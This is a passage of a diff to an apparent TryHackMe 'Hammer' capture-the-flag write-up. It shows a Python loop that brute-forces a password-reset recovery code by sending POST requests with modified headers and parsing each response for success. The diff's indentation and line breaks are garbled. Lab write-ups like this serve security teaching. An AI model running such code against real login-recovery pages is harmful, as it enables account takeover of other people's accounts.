Karunamay-km/write-ups/THM/Hammer/hammer_challenge.md

             's': '170'
         }
         try:
-            if not stop_event.is_set():

             # Send POST request with modified headers
             response = session.post(url=OTP_URL, data=data, headers=local_headers)

             # Check if the time limit has reached for providing the code
             location_header = response.headers.get('Location', '')
             if "Time elapsed" in location_header:
                 print("Time elapsed.
 Please try again later.")
                 stop_event.set()
                 break

             if response.status_code == 200:
                 print(f"Rate Limit: {response.headers.get('Rate-Limit-Pending')} | Cookie: {session.cookies}")

                 soup = BeautifulSoup(response.text, "html.parser")

-                    # Look for Error and Success indicator.
-If code is invalid an HTML tag containing an error message having the class "alert"
+                # Look for the Error and Success indicators.
+If the code is invalid, an HTML tag containing an error message with the class "alert"
                 # will show on the page. if we find that tag mean the code is invalid.
-                    # Otherwise is the code is valid, and the page will updated and a field for NEW_PASSWORD and CONFIRM_PASSWORD
+                # Otherwise, the code is valid, and the page will be updated, and a field for NEW_PASSWORD and CONFIRM_PASSWORD will be added
-                    # [IMPORTANT]: Even if the page updated with new password field upon valid code entry, the error message
+                # [IMPORTANT]: Even if the page is updated with a new password field upon valid code entry, the error message
                 # for the invalid code of previous attempts will still be on the page.
                 invalid_code_tag = soup.find(class_="alert")
                 new_password_tag = soup.find(id="new_password")

                 if new_password_tag != None:
                     stop_event.set()
                     print(f"[VALID] recovery code found {code}")
                     return code

                 if invalid_code_tag != None:
                     if "Invalid or expired recovery code!" in invalid_code_tag.text: print(f"invalid recovery code {code}")

         except Exception as e:
             print(f"[ERROR] could not brute force recovery code!")